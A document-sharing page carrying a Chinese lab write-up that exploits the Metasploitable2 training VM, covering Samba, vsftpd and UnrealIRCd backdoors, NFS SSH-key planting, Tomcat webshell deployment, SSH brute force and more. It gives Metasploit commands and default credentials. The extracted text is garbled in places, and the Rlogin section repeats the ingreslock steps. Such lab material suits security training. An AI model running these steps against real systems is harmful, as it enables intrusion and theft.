ImageVerifierCode 换一换
格式:DOCX , 页数:30 ,大小:1.48MB ,
资源ID:2907677      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bingdoc.com/d-2907677.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(Metasploitable2靶机漏洞hanxu.docx)为本站会员(b****1)主动上传,冰点文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰点文库(发送邮件至service@bingdoc.com或直接QQ联系客服),我们立即给予删除!

Metasploitable2靶机漏洞hanxu.docx

1、Metasploitable2靶机漏洞hanxuMetasploitable2靶机漏洞弱密码漏洞(Weak Password)安全组织索引CVE:OSVDB:BID:原理系统或者数据库的登录用户,密码简单或者和用户名相同,容易通过暴力破解手段来获取密码。参考链接如下:影响系统/软件所有使用用户名/密码登录的系统/软件都有可能存在此问题。在Metasploitable2中,系统口令、MySQL、PostgreSQL和VNC远程登录都存在弱密码漏洞使用工具Kali-linux利用步骤系统弱密码登录1.在kali上执行命令行telnet 7.7.5.251 232.login和password都输入

2、msfadmin3.登录成功,进入系统4.5.相同的步骤,弱密码还有user/user、postgres/postgres、sys/batman、klog/123456789、service/serviceMySQL弱密码登录1.在kali上执行mysql h 7.7.5.251 u root2.登录成功,进入mysql系统3.PostgreSQL弱密码登录1.在kali上执行psql h 7.7.5.251 U postgres2.输入密码postgres3.登录成功,进入postgresql系统4.VNC弱密码登录1.在kali图形界面的终端中执行vncviewer 7.7.5.2512.

3、输入密码password3.登录成功,进入系统4.5.攻击样本对应规则友商防护能力Samba MS-RPC Shell命令注入漏洞安全组织索引CVE:CVE-2007-2447BID:BID-23972OSVDB:OSVDB-34700原理Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。参考链接如下:http:/samba.org/samba/security/CVE-2007-2447.htm

4、l影响系统/软件Xerox WorkCentre ProXerox WorkCentreVMWare ESX ServerTurbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJITrustix Secure LinuxSUSE Linux EnterpriseSun SolarisSlackware LinuxRedHat EnterpriseMandriva LinuxMandrakeSoft Corporate ServerHP HP-UXGentoo LinuxDebian LinuxApple Mac OS X使

5、用工具Kali,Metasploit利用步骤1.在kali中执行msfconsole,启动metasploit2.use exploit/multi/samba/usermap_script,选择漏洞3.set RHOST 7.7.5.251,设置要攻击的机器IP4.exploit,开始攻击5.利用成功,执行uname a验证6.攻击样本对应规则友商防护能力Vsftpd源码包后门漏洞安全组织索引CVE:BID:BID-48539OSVDB:OSVDB-73573原理在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代

6、码。参考链接如下:影响系统/软件Vsftpd server v2.3.4使用工具Kali,Metasploit利用步骤1.在kali中执行msfconsole,启动metasploit2.use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞3.set RHOST 7.7.5.251,设置要攻击的机器IP4.exploit,开始攻击5.利用成功,执行uname a验证6.攻击样本对应规则友商防护能力UnrealIRCd后门漏洞安全组织索引CVE:CVE-2010-2075BID:BID-40820OSVDB:OSVDB-65445原理在2009年11月到20

7、10年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。参考链接如下:影响系统/软件Unreal UnrealIRCd 3.2.8.1使用工具Kali,Metasploit利用步骤1.在kali中执行msfconsole,启动metasploit2.use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞3.set RHOST 7.7.5.251,设置要攻击的机器IP4.exploit,开始攻击5.利用成功,执行uname a验证6.攻击样本对应规则友商防

8、护能力Linux NFS共享目录配置漏洞安全组织索引CVE:无OSVDB:无BID:无原理NFS 服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/ authorized_keys可被修改,实现远程ssh无密码登陆。影响系统/软件所有Linux系统的NFS服务使用工具Kali-linux利用步骤1.在kali上执行命令行rpcinfo p 7.7.5.251,查看nfs服务有无开启:2.用showmount -e 7.7.5.251查看其设置的远程共享目录列表:3.输入ssh-keygen生成rsa公钥:4.依次输入mount t nfs 7.7.5.251:/ /tmp/t0

9、0l(预先创建),把7.7.5.251的根目录挂载到/tmp/t00l/下;注:如果提示下图中错误则需要/etc/init.d/rpcbind start来启动mountcat /root/.ssh/id_rsa.pub /tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;ssh root7.7.5.251,实现无密码登陆攻击样本无对应规则友商防护能力Java RMI SERVER命令执行漏洞安全组织索引CVE:无OSVDB:17535BID:无原理Java RMI Server的RMI注册表和RMI激活服务的默认配

10、置存在安全漏洞,可被利用导致代码执行影响系统/软件Oracle Java RMI Server使用工具Metasploit利用步骤1.Nmap p0-65535 7.7.5.251来查看1099端口是否开启2.依次输入以下命令:use exploit/multi/misc/java_rmi_serverset RHOST 7.7.5.251(靶机IP)exploitshell(进入meterpreter时执行)然后即可获得shell了攻击样本对应规则友商防护能力Tomcat管理台默认口令漏洞安全组织索引CVE:无OSVDB:无BID:无原理Tomcat 管理台安装好后需要及时修改默认管理账户,

11、并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.影响系统/软件Tomcat使用工具NessusJSPwebshell利用步骤1.访问7.7.5.251:8081,点击tomcat manager,输入tomcat/tomcat,即可进入管理台2.在自己机器上准备好JSP webshell(liuz.jsp),通过jar cvf 来打包成liuz.war3.通过tomcat管理台deploy刚才打包的liuz.war4.打包成功可以看到应用目录生成(/liuz)5.访问7.7.5.251/liuz/liuz.jsp得到webshell攻击样本对应规则友商防护能力Root用户

12、弱口令漏洞(SSH爆破)安全组织索引CVE:无OSVDB:无BID:无原理靶机root用户存在弱口令漏洞,在使用指南里并没有指出。.影响系统/软件Linux使用工具metasploit利用步骤1.输入nmap sV O 7.7.5.251,查看SSH端口是否开启:2.打开metasploit framework依次输入:use auxiliary/scanner/ssh/ssh_loginset RHOSTS 7.7.5.251set USERNAME rootset PASS_FILE /tmp/r00t/pass.txt(字典文件,需要预先生成)set THREADS 50run root

13、口令爆破成功 ,口令为root3.ssh root7.7.5.251 成功登陆:攻击样本对应规则友商防护能力Distcc后门漏洞安全组织索引CVE:CVE-2004-2687BID:OSVDB:OSVDB-13378原理Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。参考链接如下:http:/cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687影响系统/软件distcc 2.x使用工具Kali,Metasplo

14、it利用步骤1.在kali中执行msfconsole,启动metasploit2.msf use exploit/unix/misc/distcc_exec,选择漏洞3.set RHOST 7.7.5.251,设置要攻击的机器IP4.exploit,开始攻击5.利用成功,执行id查看权限,uname a验证服务器信息6.攻击样本对应规则友商防护能力Samba sysmlink 默认配置目录遍历漏洞安全组织索引CVE:CVE- 2010-0926BID:33598OSVDB:OSVDB-62145原理Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享

15、和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含.的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。参考链接如下:影响系统/软件before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3使用工具Kali,Metasploit利用步骤1.在kali中执行msfconsole,启动metasploit2.use auxiliary/admin/smb/samba_symlink_traversal,选择漏洞3.set RHOS

16、T 7.7.5.251,设置要攻击的机器IP4.msf auxiliary(samba_symlink_traversal) set SMBSHARE tmp 设置SAM可写文件5.exploit,开始攻击6.rootyd0str:# smbclient /7.7.5.251/tmp 在新窗口下执行smbclient命令打开上面生成的共享目录7.smb: cd rootfs 进入rootfs目录8.smb: rootfs ls 执行ls命令列出目录,9.smb: rootfs more /etc/passwd 列出密码文件,利用成功10.11.攻击样本对应规则友商防护能力PHP CGI参数注入

17、执行漏洞安全组织索引CVE:CVE- 2012-1823BID:OSVDB:OSVDB-81633原理CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。参考链接如下: http:/www.osvdb.org/81633 http:/www.osvdb.org/93979 http:/www.exploit- 影响系统/软件before 5.3.12 and 5.4.x before 5.4.2使用工具Kali,Metasploit利用步骤1.在kali中执行msfconsole,启动metasploit2.msf use exploit/multi/htt

18、p/php_cgi_arg_injection,选择漏洞3.set RHOST 7.7.5.251,设置要攻击的机器IP4.exploit,开始攻击5.meterpreter ls 获得meterpreter,可执行ls列出目录确认承认6.攻击样本对应规则友商防护能力Druby 远程代码执行漏洞安全组织索引CVE:CVE- 2013-0156(类似)BID:OSVDB:原理Druby配置不当,被滥用执行命令(Distributed Ruby or DRb allows Ruby programs to communicate with each other on the same machin

19、e or over a network. DRb uses remote method invocation (RMI) to pass commands and data between processes)参考链接如下:http:/www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html影响系统/软件Ruby 1.8使用工具Kali,Metasploit利用步骤1.rootyd0str:# nmap -p0-65535 -sS -sV 7.7.5.251,NMAP扫描端口及端口应用(或者amap -bqv 7.7.5.251 8787)2

20、.在kali中执行msfconsole,启动metasploit3.发现8787druby端口4.msf search drb 搜索dbr相关漏洞5.msf use exploit/linux/misc/drb_remote_codeexec 使用漏洞6.set URI druby:7.7.5.255:8787,设置要攻击的机器的druby链接7.exploit,开始攻击8.输入id, uname -a确认9.10.攻击样本对应规则友商防护能力Ingreslock后门漏洞安全组织索引CVE:BID:OSVDB:原理Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得

21、root权限参考链接如下:影响系统/软件使用工具Kali利用步骤1.在kali中执行命令行 telnet 7.7.5.251 15242.获得root权限3.执行uname a验证4.攻击样本对应规则友商防护能力Rlogin后门漏洞安全组织索引CVE:BID:OSVDB:原理TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts + +)。要利用这个配置,确保rsh客户端已经安装(在linux操作系统上安装例如Open SSH),然后以root权限运行下列命令,如果被提示需要一个SSH秘钥,这表示rsh客户端没有安装,ubuntu一般默认使用SSH(Debian GNU/Linux也是如此)。影响系统/软件Linux使用工具Kali利用步骤5.在kali中执行命令行 telnet 7.7.5.251 15246.获得root权限7.执行uname a验证8.攻击样本对应规则友商防护能力 (注:可编辑下载,若有不当之处,请指正,谢谢!)

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2